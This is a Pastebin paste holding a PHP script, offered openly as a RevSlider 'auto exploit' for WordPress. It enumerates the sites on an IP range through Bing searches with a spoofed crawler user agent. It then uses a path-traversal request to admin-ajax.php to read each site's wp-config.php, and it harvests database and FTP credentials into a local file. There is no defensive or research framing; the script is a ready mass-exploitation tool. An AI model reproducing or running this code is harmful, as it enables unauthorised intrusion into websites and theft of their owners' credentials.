SHARE
TWEET

Wordpress Auto Exploit (Revslider)

maron0x May 7th, 2016 271 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. echo "================ RevSlider AutoExpLoiT ================\n\n";
  6. echo "Coded By : Maronox  \n\n";
  7. echo "FB:Marouane El Maghribi\n\n";
  8. echo "================ Have Fun ================\n\n";
  9. echo "DATE ==> ";
  10. echo date("d/m/Y ")."heur =>  ".date( "h:i ")."\n";
  11. echo "Your Target : ";
  12. $ip=trim(fgets(STDIN,1024));
  13. $ip = explode('.',$ip);
  14. $ip = $ip[0].'.'.$ip[1].'.'.$ip[2].'.';
  15. for($i=0;$i <= 255;$i++)
  16.  
  17. {
  18. $sites = array_map("site", bing("ip:$ip.$i"));
  19. $un=array_unique($sites);
  20. echo "[+] Scanning -> ", $ip.$i, ""."\n";
  21. echo "Found : ".count($sites)." sites\n\n";
  22. foreach($un as $pok){
  23. $host=findit($file,"DB_HOST', '","');");
  24. $db=findit($file,"DB_NAME', '","');");
  25. $us=findit($file,"DB_USER', '","');");
  26. $pw=findit($file,"DB_PASSWORD', '","');");
  27. $bda="http://$pok";
  28.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  29.     $dn=($bda).($linkof);
  30.     $file=@file_get_contents($dn);
  31.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  32.     echo "[+] Scanning => ".$bda."\n\n";
  33.     echo "[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
  34.     echo "[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
  35.     echo "[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
  36.     echo "[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
  37.     $db="[+] DB NAME : ".findit($file,"DB_NAME', '","');")."\n\n";
  38.     $user="[+] DB USER : ".findit($file,"DB_USER', '","');")."\n\n";
  39.     $pass="[+] DB PASS : ".findit($file,"DB_PASSWORD', '","');")."\n\n";
  40.     $host="[+] DB host : ".findit($file,"DB_HOST', '","');")."\n\n";
  41.     $ux = "".$bda."\r\n";
  42.     $ux1 = "".$db."\r\n";
  43.     $ux2 = "".$user."\r\n";
  44.     $ux3 = "".$pass."\r\n";
  45.     $ux4 = "".$host."\r\n";
  46.     $ux5 = "".$ip.$i."\r\n" ;
  47.     $save=fopen('rev.txt','ab');
  48.     fwrite($save,"$i"."\r\n");
  49.     fwrite($save,"$ux"."\r\n");
  50.     fwrite($save,"$ux1");
  51.     fwrite($save,"$ux2");
  52.     fwrite($save,"$ux3");
  53.     fwrite($save,"$ux4");
  54.     fwrite($save,"$ux5","\r\n");
  55.     fwrite($save,"=====================================","\r\n");
  56.  
  57.     }
  58.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  59.     echo "FTP user : ".findit($file,"FTP_USER','","');")."\n\n";
  60.     echo "FTP pass : ".findit($file,"FTP_PASS','","');")."\n\n";
  61.     echo "FTP host : ".findit($file,"FTP_HOST','","');")."\n\n";
  62.     }
  63.     else{echo $bda." : Shit NOt VUlnerable  \n\n";}
  64. }
  65. }
  66. function findit($mytext,$starttag,$endtag) {
  67.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  68.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  69.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  70. }
  71. function site($link){
  72. return str_replace("","",parse_url($link, PHP_URL_HOST));
  73. }
  74. function bing($what){
  75. for($i = 1; $i <= 2000; $i += 10){
  76. $ch = curl_init();
  77. curl_setopt ($ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
  78. curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (http://search.msn.com/msnbot.htm)");
  79. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  80. curl_setopt ($ch, CURLOPT_COOKIEFILE,getcwd().'/cookie.txt');
  81. curl_setopt ($ch, CURLOPT_COOKIEJAR, getcwd().'/cookie.txt');
  82. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  83. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  84. $data = curl_exec($ch);
  85. preg_match_all('#;a=(.*?)" h="#',$data, $links);
  86. foreach($links[1] as $link){
  87. $allLinks[] = $link;
  88. }
  89. if(!preg_match('#"sw_next"#',$data)) break;
  90. }
  91.  
  92. if(!empty($allLinks) && is_array($allLinks)){
  93. return array_unique(array_map("urldecode", $allLinks));
  94. }
  95. }
  96. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top